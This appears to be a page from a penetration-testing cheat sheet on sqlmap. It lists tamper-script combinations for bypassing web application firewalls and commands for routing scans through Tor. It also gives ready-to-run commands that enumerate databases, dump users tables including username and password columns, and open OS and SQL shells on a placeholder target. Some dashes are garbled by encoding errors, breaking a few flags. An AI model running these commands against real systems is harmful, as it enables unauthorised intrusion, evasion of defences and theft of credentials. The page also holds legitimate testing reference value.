SqlMap

WAF Bypass

1)MSSQL

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

2)MySQL

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

3)General tampering option

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

WAF bypass example string

sudo sqlmap -m SQLtargets.txt -dbs --batch tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

#WAF bypass using TOR

sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor

Scanning multiple targets

sudo sqlmap -m SQLtargets.txt -dbs --batch
Logosqlmap/tamper at master ยท sqlmapproject/sqlmapGitHub

Easy Scanning option sqlmap -u "http://testsite.com/login.php" Scanning by using tor sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5 Scanning by manually setting the return time sqlmap -u "http://testsite.com/login.php" --time-sec 15 List all databases at the site sqlmap -u "http://testsite.com/login.php" --dbs List all tables in a specific database sqlmap -u "http://testsite.com/login.php" -D site_db --tables Dump the contents of a DB table sqlmap -u "http://testsite.com/login.php" -D site_db -T users โ€“dump List all columns in a table sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns Dump only selected columns sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump Dump a table from a database when you have admin credentials sqlmap -u "http://testsite.com/login.php" โ€“method "POST" โ€“data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users โ€“dump Get OS Shell sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell Get SQL Shell sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell Injecting site.xml pages

//Adjust according to underlying DB and target

sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
PreviousSQLi to code executionNextOne-liners

Last updated